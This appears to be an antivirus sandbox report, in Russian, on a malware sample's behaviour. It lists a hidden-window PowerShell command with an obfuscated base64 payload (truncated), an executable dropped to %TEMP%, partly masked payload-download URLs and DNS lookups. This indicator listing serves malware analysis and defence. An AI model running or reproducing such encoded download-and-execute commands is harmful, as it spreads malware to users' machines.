Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAHYARQBSAGIATwBzAGUAUAByAEUAZgBlAHIARQBOAGMAZQAuAFQATwBzAFQAcgBJAG4ARwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAG8ASQBuACcAJwApACAAKAAtAGoAbwBJAE4AIAAoACcAMwA2AEUAMQAxADkAewAxADEANQBKAD...
- %TEMP%\12668.exe
- %TEMP%\12668.exe
- %TEMP%\12668.exe
- 'cr####ostello.com':80
- 'br###stokes.net':80
- 'aq##luna.jp':80
- 'mi####lmillman.com':80
- http://cr####ostello.com/CEaq/
- http://br###stokes.net/ymxHH/
- http://aq##luna.jp/EEjS/
- http://mi####lmillman.com/wo/
- DNS ASK cr####ostello.com
- DNS ASK br###stokes.net
- DNS ASK aq##luna.jp
- DNS ASK mc##pro.pl
- DNS ASK mi####lmillman.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAHYARQBSAGIATwBzAGUAUAByAEUAZgBlAHIARQBOAGMAZQAuAFQATwBzAFQAcgBJAG4ARwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAG8ASQBuACcAJwApACAAKAAtAGoAbwBJAE4AIAAoACcAMwA2AEUAMQAxADkAewAxADEANQBKAD...' (со скрытым окном)